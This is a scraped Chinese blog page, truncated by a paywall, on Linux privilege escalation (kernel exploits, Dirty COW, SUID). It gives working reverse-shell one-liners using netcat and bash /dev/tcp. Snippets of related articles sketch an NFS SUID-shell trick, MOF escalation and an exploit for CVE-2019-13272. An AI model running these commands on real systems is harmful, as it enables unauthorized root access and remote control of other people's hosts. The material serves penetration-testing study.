Linux与数据库提权

最新推荐文章于 2024-06-13 19:35:06 发布
最新推荐文章于 2024-06-13 19:35:06 发布
阅读量621 收藏 4
点赞数
文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41755666/article/details/123610912
版权

  1. Linux系统内核漏洞提权:(常见的就是系统内核提权 | 脏牛提权 | suid提权)
    • 原理:
      • linux内核版本的分类
        Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字
        第一个组数字:目前发布的内核主版本。
        第二个组数字:偶数表示稳定版本;奇数表示开发中版本。
        第三个组数字:错误修补的次数。
    • 思路(利用linux系统漏洞进行提权,首先搜索linux系统漏洞,然后去github搜索Debian 5对应的exp进行提权):

       

    • 反弹shell提权:
      • 方式1:
        • 如果手里只有webshell可以利用反弹shell来得到一个shell
          首先我们得有一个netcat
          开启本地监听
          1.    # 开启本地8080端口监听,并将本地的bash发布出去。
          2.    nc -lvvp 8080 -t -e /bin/bash
          直接连接目标主机
          nc 192.168.1.1 8000
      • 方式2:
        • bash直接反弹
        • bash一句话shell反弹:个人感觉最好用的用的方法就是使用的方法就是使用bash结合重定向方法的一句话,具体命令如下。
          (1) bash反弹一句话  |  192.168.15.99 这个是受害机IP,不是攻击机
          1.    bash -i >& /dev/tcp/192.168.15.99/8000 0>&1
          2.    本地 nc -l -p 8000

         

    • 脏牛提权:
      • 问题:
        • kali新建用户123为普通用户普通权限,提权为管理员权限
      • 原理:
        • POC:https://github.com/FireFar
最低0.47元/天 解锁文章
赤赤三
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
超强php提权大马!过免杀代码
06-14
超强php提权大马!过免杀 代码
Linux提权方法总结
Ays.Ie的博客
11-06 3576
Linux提权方式总结
数据库提权(实战案例)
最新发布
2201_75341517的博客
06-13 1529
本文主要介绍常见数据库如何进行提权操作,如mysql(mof,udf,启动项),mssql,orcale数据库
Linux中的提权操作
weixin_52757485的博客
08-01 2134
具体工作过程:当用户执行sudo时,系统会主动寻找/etc/sudoers文件,判断该用户是否有执行sudo的权限,确认用户具有执行权限后,让用户输入用户自己的密码确认,若密码输入成功,则开始执行sudo后续的命令。临时提权的方法是用sudo的工作原理:将当前用户切换到超级用户下,以超级用户身份执行命令,执行完成后,直接退回到当前用户。[root@localhost ~]# vim /etc/sudoers (进入/etc/sudoers)(成功在普通用户下临时提权
linux下mysql添加用户并授权指定数据库权限
weixin_43652507的博客
08-11 1506
linux下mysql添加用户并授权指定数据库权限
神器!MySQL蜜罐服务GUI利用工具
潇湘信安的博客
07-17 531
开源的一个MySQL蜜罐服务利用工具,这个项目是MySQL_Fake_Server的高级版,当JDBC URL可控时,特殊的MySQL服务端可以读取JDBC客户端任意文件或执行反序列化操作,完全使用Java实现部分MySQL协议,内置常见ysoserial链,一键启动,自动生成可用的payload用于测试。
干货丨渗透测试常用方法总结,大神之笔!
A_991128a的博客
09-18 97
一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎有授权的情况下直接使用 nmap 、masscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。使用 Python 端口扫描的介绍https://thief.one/2018/05/17/1/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.ioWindows 下基于 Powershell 的端口扫描脚本。
介绍5款 世界范围内比较广的 5款 mysql Database Management Tool
小 tom的博客
03-20 1662
MySQL 官方推出的一款强大的数据库设计与管理工具,提供了丰富的功能,包括数据库建模、SQL 开发、数据库管理等,支持跨平台使用。下载地址https://www.mysql.com/products/workbench/这里列出了一些优缺点这里是关于这五款数据库管理工具的优缺点:优点: 完全免费且由 MySQL 官方支持,与 MySQL 数据库完美集成。提供了丰富的功能,包括数据库设计、SQL 编辑、数据建模和管理等。图形化界面直观易用,适合数据库开发和管理。
13 款炫酷的 MySQL 可视化管理工具!好用到爆!!
热门推荐
y1282037271的博客
01-04 1万+
MySQL 的管理维护工具非常多,除了系统自带的命令行管理工具之外,还有许多其他的图形化管理工具,工具好用是一方面,个人的使用习惯也很重要,这里介绍 13 款 MySQL 图形化管理工具,供大家参考。
mysql常用的工具类_Web常用工具类
weixin_39978863的博客
02-08 130
人手必备的java工具类,中间件com.google.guavaguava28.1-jreorg.apache.commonscommons-collections44.4org.apache.commonscommons-lang3com.alibabafastjson1.2.62Json工具类ServerResponse - 通用Json响应对象ResponseCode是封装code和desc...
MySQL数据库***及漏洞利用总结
weixin_34357887的博客
11-14 921
MySQL 数据库***及漏洞利用总结SimeonMySQL 数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用 MySQL 作为其数据库支撑,目前很多架构都以 MySQL 作为数据库管理系统,例如 LAMP、和 WAMP 等。在针对网站***中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入,MySQL 提权,MySQL 数据库 root 账号 webshell 获...
Mysql数据库渗透及漏洞利用总结
Fly_鹏程万里
07-07 4003
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然...
详细|Linux提权总结
st3pby的博客
11-06 7785
Linux提权总结
基于Linux下的root提权骚操作
帅醉了的博客
01-30 5600
0x00_前言 小小博客,大大梦想。 博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权到root下的操作,如有错误或其他请多多包含,希望提出多交流。 0x01_操作简介 提权的三个骚操作: 内核溢出 明文密文解密 计划任何进程 密码复用 加粗样式 ...
linux mysql mof提权,mysql提权之mof提权
weixin_39629631的博客
05-10 255
拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权首先介绍mof提权,直接案例演示找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{Eve...
ubuntu 最新提权漏洞_利用mssql受信用数据库提权
weixin_39626369的博客
11-24 132
更多全球网络安全资讯尽在邑安全0x01 前提前提条件,我们获取sqlserver一个名为MyAppUser01 的用户密码,这个用户对MyTestdb01有db_owner权限,并且对MyTestdb01受信用,然后我们可以利用这个用户提权到syadmin权限测试服务器版本0x02创建用户,受信用数据库1.创建数据库CREATE DATABASE MyTestdb01SELECT sus...
mysql提权方式linux_Linux提权的几种常用方式
weixin_35804557的博客
02-08 838
sudo showmount -e 10.1.1.233(2)创建本地挂载目录,挂载共享目录。使用sudo mkdir -p /tmp/datasudo mount -t nfs 10.1.1.233:/home/bypass /tmp/datacp /bin/bash /tmp/data/shellchmod u+s /tmp/data/shell(3)回到要提权的服务器上,使用普通用户使用-p...
Linux提权大全
yggcwhat
05-14 9443
Linux提权大全
Ubuntu18下登录mysql 5.7设置root密码
simple的博客
06-20 1180
ubuntu18.04 mysql设置root密码
〖EXP〗Ubuntu 18.04提权Linux 4.10 < 5.1.17 (CVE-2019-13272)
K8哥哥
01-21 3860
简介 Ubuntu 18.04 提权Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) 测试 // Tested on: // - Ubuntu 16.04.5 kernel 4.15.0-29-generic // - Ubuntu 18.04.1 kernel 4.15.0-20-generic // - Ubuntu 19.04 kernel 5.0.0-15-generic // - Ubuntu Mate 18.04.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值